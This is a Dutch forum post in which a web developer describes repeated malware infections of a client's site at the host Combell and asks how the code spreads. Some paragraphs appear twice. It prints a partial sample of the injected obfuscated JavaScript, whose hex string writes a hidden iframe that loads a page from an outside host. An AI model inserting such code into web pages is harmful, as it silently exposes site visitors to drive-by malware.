smalle
Legacy Member
Een klant van mij heeft zijn website hosten bij Combell. Het is ondertussen al de 3e keer dat er malware op deze website terecht komt. Indien ik bij Google de 'safe browsing' pagina van het Combell netwerk opvraag lijkt het alsof exact dezelfde malware ook op vele andere sites van hen terug te vinden is.
Na telefonisch contact met Combell de eerste keer dat er malware op mijn klant's website terrecht kwam, gaven ze wel toe dat er 'problemen waren bij verschillende websites van verschillende klanten', maar toen ik over malware begon verliep het allemaal extreem vaag.
De malware code nestelt zich in verschillende pagina's: .js, .html, .php,... en is een pain in the ass om te verwijderen omdat de code op vele pagina's lichtjes verschilt van elkaar. Een stukje van deze code ziet er als volgt uit:
Ik vraag mij vooral af of de code wel degelijk verspreid wordt via Combells eigen netwerk of via de PC's bij mijn klant die toegang hebben tot de backend van de website.
Na telefonisch contact met Combell de eerste keer dat er malware op mijn klant's website terrecht kwam, gaven ze wel toe dat er 'problemen waren bij verschillende websites van verschillende klanten', maar toen ik over malware begon verliep het allemaal extreem vaag.
De malware code nestelt zich in verschillende pagina's: .js, .html, .php,... en is een pain in the ass om te verwijderen omdat de code op vele pagina's lichtjes verschilt van elkaar. Een stukje van deze code ziet er als volgt uit:
Code:
<script>function v4a89a49d12534(v4a89a49d1291c){ var v4a89a49d12d04=16;
...
document.write(v4a89a49d134d4('3C696672616D65206E616D653D2762373262666534626630323727207372633D27687474703A2F2F747261636B696E676C6F61642E636F6D2F652F696E646578372E706870272077696474683D363931206865696768743D333536207374796C653D27646973706C61793A6E6F6E65273E3C2F696672616D653E'));</script>
Ik vraag mij vooral af of de code wel degelijk verspreid wordt via Combells eigen netwerk of via de PC's bij mijn klant die toegang hebben tot de backend van de website.